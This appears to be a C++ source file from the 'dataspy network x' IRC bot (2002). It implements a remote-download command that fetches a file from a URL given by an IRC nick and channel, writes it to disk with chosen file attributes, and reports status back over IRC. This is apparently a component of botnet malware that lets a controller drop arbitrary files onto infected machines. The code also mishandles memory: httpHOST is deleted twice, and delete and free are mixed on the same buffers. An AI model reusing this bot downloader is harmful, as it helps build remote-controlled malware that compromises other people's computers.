 /*	
	dataspy network x version 0.5 beta
	Copyright (C) 2002 dataspy dot net INC

	This program is free software; you can redistribute it and/or
	modify it under the terms of the GNU General Public License
	as published by the Free Software Foundation; either version 2
	of the License, or (at your option) any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program; if not, write to the Free Software
	Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
  */

 /*

	httpdownload.cpp - Download a file from a webserver - Blocks!

	Last revised : 31st March 2002

  */


#include <stdio.h>
#include "..\include\tcp.h"
#include "../include/dsnxsockets.h"
#include "..\include\httpdownload.h"
#include "../include/dsnxsockets.h"
#include "..\include\mainbot.h"
#include "..\include\nickdb.h"

BOOL HttpDownload (char *fromURL,char* toFILE,DWORD fileATTRIBUTES,char *fromNICK,char *fromCHAN,MainBot *fromBOT,char *buffer) {

	char *httpHOST,*httpFILE,*getREQUEST,*httpREPLY,*httpALIGN;
	SOCKET The_Socket = INVALID_SOCKET;
	DWORD	recvd_len =0,written_len=0,total_recvd=0;
	USHORT	timeout =0;
	HANDLE fFile;
	
	strcpy(buffer,"Bad URL\0");

	if ( !strnicmp("http://",fromURL,7) ) 
		fromURL += 7;

	httpHOST = new char[strlen(fromURL) + 1];

	if (!httpHOST)
		return FALSE;

	strcpy(httpHOST,fromURL);

	httpFILE = strchr(httpHOST,'/');

	if ( !httpFILE )
		return FALSE;

	*(httpFILE)++ = 0;

	if ( (The_Socket = SmartConnect(httpHOST,80,DEFAULT_CONNECT_TIME) ) == INVALID_SOCKET ) {

		sprintf(buffer,"Error Connecting to %s",httpHOST);
		delete httpHOST;
		return FALSE;
	}

//
//Send command to http server to retreive file
//
	getREQUEST = new char[(strlen(httpHOST) * 2) + strlen(httpFILE) + 128];

	if (!getREQUEST) {
		delete httpHOST;
		return FALSE;
	}

	TCPSend(The_Socket,getREQUEST,sprintf(getREQUEST,
		"GET http://%s/%s HTTP/1.1\r\nHOST: %s\r\n\r\n",
		httpHOST,httpFILE,httpHOST));

	Sleep(100);
	delete getREQUEST;
	delete httpHOST;

//
//Get header from http server
//
	while ( (recvd_len = TCPRecv(The_Socket,&httpREPLY)) < 1 && timeout < 4000) {
		
		Sleep(100);
		timeout+=100;
		
	} 

	strcpy(buffer,"http reply header never received");

	if (recvd_len < 1) {

		closesocket(The_Socket);
		return FALSE;
	}
//
//Check if the reply is "yes"
//
	if ( strnicmp(" 200 ok",httpREPLY + 8,7) ) {

		char *tmp = strchr(httpREPLY,'\n');

		if (tmp) {
			*tmp++ =0;

			strcpy(buffer,httpREPLY);
		}

		HardClose(The_Socket);
		delete httpREPLY;
		return FALSE;
	}

//
//Figure out how much of the file we already got from the header
//

	if (fromBOT != 0)
		fromBOT->SendIRCMessage("Started downloading :D",fromNICK,fromCHAN,FALSE);

	httpALIGN = strstr(httpREPLY,"\r\n\r\n");

	if (!httpALIGN) {

		HardClose(The_Socket);
		delete httpREPLY;
		return FALSE;
	}

	httpALIGN +=4;
	total_recvd = recvd_len - (httpALIGN - httpREPLY);

//
//Open file on disk, and write the incoming data to the file
//
	if ( (fFile = CreateFile(toFILE,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,fileATTRIBUTES,NULL) ) == INVALID_HANDLE_VALUE) {
		
		strcpy(buffer,"Error: Unable To Open Output File");
		HardClose(The_Socket);
		delete httpHOST;
		delete httpREPLY;
		return FALSE;
	}

	WriteFile(fFile,httpALIGN,total_recvd,&written_len,NULL);
	free(httpREPLY);
	timeout=0;

	while (timeout < 6000) {

		recvd_len = TCPRecv(The_Socket,&httpREPLY);
		
		if (recvd_len > 0) {

			WriteFile(fFile,httpREPLY,recvd_len,&written_len,NULL);
			total_recvd += recvd_len;
			free(httpREPLY);
			timeout=0;

		} else if (!recvd_len) {

			Sleep(100);
			timeout += 100;			
			
			
		}else if (recvd_len == -1){
			break;						
		}

		Sleep(10);

	}

	CloseHandle(fFile);
	HardClose(The_Socket);

	sprintf(buffer,"Download complete. [%dkb] -> %s",total_recvd/1024,toFILE);
	return TRUE;

}

